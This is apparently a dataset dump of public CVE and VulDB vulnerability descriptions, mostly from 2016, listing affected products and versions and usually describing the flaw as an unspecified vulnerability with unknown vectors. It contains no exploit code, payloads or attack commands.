libxslt in Apple iOS before 9.3.3, OS X before 10.11.6, iTunes before 12.4.2 on Windows, iCloud before 5.2.1 on Windows, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2016-4607, CVE-2016-4608, CVE-2016-4609, and CVE-2016-4612.
libxslt in Apple iOS before 9.3.3, OS X before 10.11.6, iTunes before 12.4.2 on Windows, iCloud before 5.2.1 on Windows, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2016-4607, CVE-2016-4608, CVE-2016-4610, and CVE-2016-4612.
libxslt in Apple iOS before 9.3.3, OS X before 10.11.6, iTunes before 12.4.2 on Windows, iCloud before 5.2.1 on Windows, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2016-4607, CVE-2016-4609, CVE-2016-4610, and CVE-2016-4612.
libxslt in Apple iOS before 9.3.3, OS X before 10.11.6, iTunes before 12.4.2 on Windows, iCloud before 5.2.1 on Windows, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors, a different vulnerability than CVE-2016-4608, CVE-2016-4609, CVE-2016-4610, and CVE-2016-4612.
An unspecified ActiveX control in Schneider Electric SoMachine HVAC Programming Software for M171/M172 Controllers before 2.1.0 allows remote attackers to execute arbitrary code via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag.
Unspecified ActiveX controls in Advantech WebAccess before 8.1_20160519 allow remote authenticated users to obtain sensitive information or modify data via unknown vectors, related to the INTERFACESAFE_FOR_UNTRUSTED_CALLER (aka safe for scripting) flag.
ABB PCM600 before 2.7 improperly stores OPC Server IEC61850 passwords in unspecified temporary circumstances, which allows local users to obtain sensitive information via unknown vectors.
Panasonic FPWIN Pro 5.x through 7.x before 7.130 accesses an uninitialized pointer, which allows local users to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Format string vulnerability in libxml2 before 2.9.4 allows attackers to have unspecified impact via format string specifiers in unknown vectors.
HPE System Management Homepage before v7.6 allows remote attackers to have an unspecified impact via unknown vectors, related to a "Buffer Overflow" issue.
HPE System Management Homepage before v7.6 allows remote attackers to have an unspecified impact via unknown vectors, related to a "Buffer Overflow" issue.
Multiple unspecified vulnerabilities in HPE Integrated Lights-Out 3 (aka iLO 3) firmware before 1.88, Integrated Lights-Out 4 (aka iLO 4) firmware before 2.44, and Integrated Lights-Out 4 (aka iLO 4) mRCA firmware before 2.32 allow remote attackers to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier allows remote attackers to execute arbitrary code via unknown vectors, as exploited in the wild in June 2016.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Adobe Flash Player 21.0.0.213 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-064.
Unspecified vulnerability in Zimbra Collaboration before 8.7.0 allows remote attackers to affect integrity via unknown vectors, aka bug 104477.
The Huawei Hilink App application before 3.19.2 for Android does not validate SSL certificates, which allows local users to have unspecified impact via unknown vectors, aka HWPSIRT-2016-03008.
Unspecified vulnerability in a Qualcomm component in Android before 2016-10-05 on Nexus 5X and 6P devices has unknown impact and attack vectors, aka internal bug 28823675.
Unspecified vulnerability in a Qualcomm component in Android before 2016-10-05 on Nexus 5X and 6P devices has unknown impact and attack vectors, aka internal bug 28823244.
Unspecified vulnerability in a Qualcomm component in Android before 2016-10-05 on Nexus 5, 5X, 6, and 6P devices has unknown impact and attack vectors, aka internal bug 28823953.
Unspecified vulnerability in Android before 2016-09-01 has unknown impact and attack vectors.
XML external entity (XXE) vulnerability in XmlMapper in the Data format extension for Jackson (aka jackson-dataformat-xml) allows attackers to have unspecified impact via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 4.9.385.33, as used in Google Chrome before 49.0.2623.108, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The Huawei Wear App application before 15.0.0.307 for Android does not validate SSL certificates, which allows local users to have unspecified impact via unknown vectors, aka HWPSIRT-2016-03008.
Unspecified vulnerability in the OJVM component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking component in Oracle Financial Services Applications 12.0.1, 12.0.2, and 12.0.3 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Knowledge Management component in Oracle E-Business Suite 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5 allows remote administrators to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Enterprise Communications Broker component in Oracle Communications Applications before PCz 2.0.0m4p1 allows remote attackers to affect confidentiality via unknown vectors.
Unspecified vulnerability in the JDBC component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2; the Oracle Retail Xstore Point of Service 5.5, 6.0, 6.5, 7.0, 7.1, 15.0, and 16.0; the Oracle Retail Warehouse Management System 14.04, 14.1.3, and 15.0.1; the Oracle Retail Workforce Management 1.60.7, and 1.64.0; the Oracle Retail Clearance Optimization Engine 13.4; the Oracle Retail Markdown Optimization 13.4 and 14.0; and Oracle Retail Merchandising System 16.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 11.1.1.8 and 12.2.1.0 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Data Pump Import component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows local users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the DB Sharding component in Oracle Database Server 12.1.0.2 allows local users to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 11.1.1.8, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Database Vault component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows local users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Portable Clusterware component in Oracle Database Server 11.2.0.4 and 12.1.0.2 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the BI Publisher (formerly XML Publisher) component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, and 12.2.1.0.0 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the Application Express component in Oracle Database Server before 5.0.4 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Application Express component in Oracle Database Server before 5.0.4 allows remote attackers to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Oracle Configurator component in Oracle Supply Chain Products Suite 12.0.6, 12.1, and 12.2 allows remote attackers to affect confidentiality and integrity via vectors related to JRAD Heartbeat. NOTE: the previous information is from the April 2016 CPU. Oracle has not commented on third-party claims that that this issue involves multiple cross-site scripting (XSS) vulnerabilities, which allow remote attackers to inject arbitrary web script or HTML via three unspecified parameters in an unknown JSP file.
Unspecified vulnerability in the DataStore component in Oracle Berkeley DB 11.2.5.0.32, 11.2.5.1.29, 11.2.5.2.42, 11.2.5.3.28, 12.1.6.0.35, and 12.1.6.1.26 allows local users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0682, CVE-2016-0689, CVE-2016-0692, and CVE-2016-0694.
Unspecified vulnerability in Zimbra Collaboration before 8.6.0 Patch 7 allows remote authenticated users to affect availability via unknown vectors, aka bug 102029.
Unspecified vulnerability in Zimbra Collaboration before 8.7.0 allows remote attackers to affect integrity via unknown vectors, aka bug 103996.
Multiple unspecified vulnerabilities in Zimbra Collaboration before 8.7.0 allow remote attackers to affect integrity via unknown vectors, aka bugs 103961 and 104828.
Unspecified vulnerability in Zimbra Collaboration before 8.7.0 allows remote attackers to affect integrity via unknown vectors, aka bug 103959.
Unspecified vulnerability in Zimbra Collaboration before 8.7.0 allows remote attackers to affect confidentiality via unknown vectors, aka bug 99167.
Unspecified vulnerability in Zimbra Collaboration before 8.7.0 allows remote authenticated users to affect integrity via unknown vectors, aka bug 99810.
The mod_tls module in ProFTPD before 1.3.5b and 1.3.6 before 1.3.6rc2 does not properly handle the TLSDHParamFile directive, which might cause a weaker than intended Diffie-Hellman (DH) key to be used and consequently allow attackers to have unspecified impact via unknown vectors.
CRLF injection vulnerability in CA API Gateway (formerly Layer7 API Gateway) 7.1 before 7.1.04, 8.0 through 8.3 before 8.3.01, and 8.4 before 8.4.01 allows remote attackers to have an unspecified impact via unknown vectors.
Multiple unspecified vulnerabilities in IBM BigFix Remote Control before 9.1.3 allow remote attackers to obtain sensitive information via unknown vectors.
IBM BigFix Remote Control before 9.1.3 uses cleartext storage for unspecified passwords, which allows local users to obtain sensitive information via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 4.9.385.26, as used in Google Chrome before 49.0.2623.75, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 48.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Mozilla Network Security Services (NSS) before 3.23, as used in Mozilla Firefox before 47.0, allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 47.0 and Firefox ESR 45.x before 45.2 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 47.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 46.0, Firefox ESR 38.x before 38.8, and Firefox ESR 45.x before 45.1 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 46.0 and Firefox ESR 45.x before 45.1 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Unspecified vulnerability in the browser engine in Mozilla Firefox ESR 38.x before 38.8 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 46.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
The graphite2::FileFace::get_table_fn function in Graphite 2 before 1.3.6, as used in Mozilla Firefox before 45.0 and Firefox ESR 38.x before 38.7, does not initialize memory for an unspecified data structure, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted Graphite smart font.
The graphite2::TtfUtil::GetTableInfo function in Graphite 2 before 1.3.6, as used in Mozilla Firefox before 45.0 and Firefox ESR 38.x before 38.7, does not initialize memory for an unspecified data structure, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted Graphite smart font.
Ecava IntegraXor before 5.0 build 4522 allows remote attackers to bypass authentication and access unspecified web pages via unknown vectors.
Cross-site scripting (XSS) vulnerability in an unspecified portal authentication page in Huawei Agile Controller-Campus with software before V100R001C00SPC319 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Directory traversal vulnerability in the file-download configuration file in the management console in Symantec Workspace Streaming (SWS) 7.5.x before 7.5 SP1 HF9 and 7.6.0 before 7.6 HF5 and Symantec Workspace Virtualization (SWV) 7.5.x before 7.5 SP1 HF9 and 7.6.0 before 7.6 HF5 allows remote authenticated users to read unspecified application files via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in the Organizations and Remediation management page in Enterprise Manager in McAfee Vulnerability Manager (MVM) before 7.5.10 allow remote attackers to hijack the authentication of administrators for requests that have unspecified impact via unknown vectors.
The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.
Off-by-one vulnerability in the fgetwln function in libbsd before 0.8.2 allows attackers to have unspecified impact via unknown vectors, which trigger a heap-based buffer overflow.
Cross-site request forgery (CSRF) vulnerability in VMware vRealize Log Insight 2.x and 3.x before 3.3.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in Google V8 before 4.8.271.17, as used in Google Chrome before 48.0.2564.82, allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
HPE ArcSight ESM 5.x before 5.6, 6.0, 6.5.x before 6.5C SP1 Patch 2, and 6.8c before P1, and ArcSight ESM Express before 6.9.1, allows remote authenticated users to conduct unspecified "file download" attacks via unknown vectors.
Use-after-free vulnerability in the DesktopDisplayDevice class in the WebRTC implementation in Mozilla Firefox before 45.0 on Windows might allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple race conditions in dom/media/systemservices/CamerasChild.cpp in the WebRTC implementation in Mozilla Firefox before 45.0 on Windows might allow remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Race condition in libvpx in Mozilla Firefox before 45.0 on Windows might allow remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via unknown vectors.
The I420VideoFrame::CreateFrame function in the WebRTC implementation in Mozilla Firefox before 45.0 on Windows omits an unspecified status check, which might allow remote attackers to cause a denial of service (memory corruption) or possibly have other impact via unknown vectors.
Integer underflow in the srtp_unprotect function in the WebRTC implementation in Mozilla Firefox before 45.0 on Windows might allow remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 45.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via vectors related to js/src/jit/arm/Assembler-arm.cpp, and unknown other vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 45.0 and Firefox ESR 38.x before 38.7 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
The Buffer11::NativeBuffer11::map function in ANGLE, as used in Mozilla Firefox before 44.0, might allow remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 44.0 and Firefox ESR 38.x before 38.6 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
The User Management Engine (UME) in SAP NetWeaver 7.4 allows attackers to decrypt unspecified data via unknown vectors, aka SAP Security Note 2191290.
Multiple unspecified vulnerabilities in Google Chrome before 52.0.2743.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 51.0.2704.103 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 51.0.2704.79 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 51.0.2704.63 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Use-after-free vulnerability in ports/SkFontHost_FreeType.cpp in Skia, as used in Google Chrome before 51.0.2704.63, allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 50.0.2661.94 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
extensions/renderer/gc_callback.cc in Google Chrome before 50.0.2661.94 does not prevent fallback execution once the Garbage Collection callback has started, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 50.0.2661.75 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The media subsystem in Google Chrome before 50.0.2661.75 does not initialize an unspecified data structure, which allows remote attackers to cause a denial of service (invalid read operation) via unknown vectors.
Use-after-free vulnerability in the RenderWidgetHostImpl::Destroy function in content/browser/renderer_host/render_widget_host_impl.cc in the Navigation implementation in Google Chrome before 49.0.2623.108 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 49.0.2623.75 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
extensions/renderer/render_frame_observer_natives.cc in Google Chrome before 49.0.2623.75 does not properly consider object lifetimes and re-entrancy issues during OnDocumentElementCreated handling, which allows remote attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in Blink, as used in Google Chrome before 49.0.2623.75, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 48.0.2564.82 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
The LoadIC::UpdateCaches function in ic/ic.cc in Google V8, as used in Google Chrome before 48.0.2564.82, does not ensure receiver compatibility before performing a cast of an unspecified variable, which allows remote attackers to cause a denial of service or possibly have unknown other impact via crafted JavaScript code.
yast2-users before 3.1.47, as used in SUSE Linux Enterprise 12 SP1, does not properly set empty password fields in /etc/shadow during an AutoYaST installation when the profile does not contain inst-sys users, which might allow attackers to have unspecified impact via unknown vectors.
The PV superpage functionality in arch/x86/mm.c in Xen 3.4.0, 3.4.1, and 4.1.x through 4.6.x allows local PV guests to obtain sensitive information, cause a denial of service, gain privileges, or have unspecified other impact via a crafted page identifier (MFN) to the (1) MMUEXT_MARK_SUPER or (2) MMUEXT_UNMARK_SUPER sub-op in the HYPERVISOR_mmuext_op hypercall or (3) unknown vectors related to page table updates.
The Grandstream Wave app 1.0.1.26 and earlier for Android does not use HTTPS when retrieving update information, which might allow man-in-the-middle attackers to execute arbitrary code via a crafted application.
A vulnerability, which was classified as critical, was found in NUUO NVRmini 2 up to 3.0.8. Affected is an unknown function of the file /deletefile.php. The manipulation of the argument filename leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258780.
A vulnerability, which was classified as problematic, has been found in go4rayyan Scumblr up to 2.0.1a. Affected by this issue is some unknown functionality of the component Task Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.2 is able to address this issue. The patch is identified as 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. It is recommended to upgrade the affected component. VDB-251570 is the identifier assigned to this vulnerability.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Deis Workflow Manager up to 2.3.2. It has been classified as problematic. This affects an unknown part. The manipulation leads to race condition. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.3 is able to address this issue. The patch is named 31fe3bccbdde134a185752e53380330d16053f7f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248847. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
A vulnerability was found in Doc2k RE-Chat 1.0. It has been classified as problematic. This affects an unknown part of the file js_on_radio-emergency.de_/re_chat.js. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named bd17d497ddd3bab4ef9c6831c747c37cc016c570. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-238155.
